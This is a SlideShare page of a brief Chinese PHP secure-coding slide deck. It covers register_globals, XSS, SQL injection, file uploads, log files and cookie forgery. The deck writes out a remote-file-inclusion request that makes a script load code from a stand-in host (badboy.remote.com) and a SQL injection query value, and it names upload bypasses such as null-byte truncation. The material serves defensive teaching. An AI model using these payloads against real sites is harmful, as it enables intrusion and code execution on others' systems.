Php safe-code

1,119 views
1,028 views

Published on

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,119
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
6
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Php safe-code

  1. 1. PHP 安全编码 ( 二 ) @ 徐钦勇 (ken@shopex.cn)
  2. 2. Register Globals: Example <ul><li><?php include &quot;$path/script.php&quot; ; ?> </li></ul><ul><li>提交一个这样的请求 </li></ul><ul><li>?path=http%3A%2F%2Fbadboy.remote.com </li></ul><ul><li>include 'http://badboy.remote.com/script.php' ; </li></ul><ul><li>这样就产生一个远程包含漏洞 </li></ul>
  3. 3. XSS: Example
  4. 4. SQL Injection: Example
  5. 5. 数字类型输入 数字大于 2147483647 会出现溢出出现负数
  6. 6. 查询内容由外部输入 ?field=version() from injection_login where 1 #
  7. 7. SQL Injection: Solution <ul><li>过滤输入数据 </li></ul><ul><li>单引输入数据 </li></ul><ul><li>转义输入数据, mysql_real_escape_string () </li></ul>
  8. 8. 葵花宝典 PHP Script Filter Escape Cookie Forms Referer, etc. xhtml MYSQL
  9. 9. 文件写入点 上传文件 写日志文件
  10. 10. 文件上传 1. 验证文件类型 2. 验证文件后缀名
  11. 11. 文件上传 1.00 截断 2. 畸形文件名
  12. 12. 文件上传
  13. 13. 文件写入点 写日志文件 <ul><li>防被下载 </li></ul><ul><li>防被执行 </li></ul>
  14. 14. COOKIE 欺诈
  15. 15. Q&A
  16. 16. Reference <ul><li>高级 PHP 应用程序漏洞审核技术 </li></ul>

×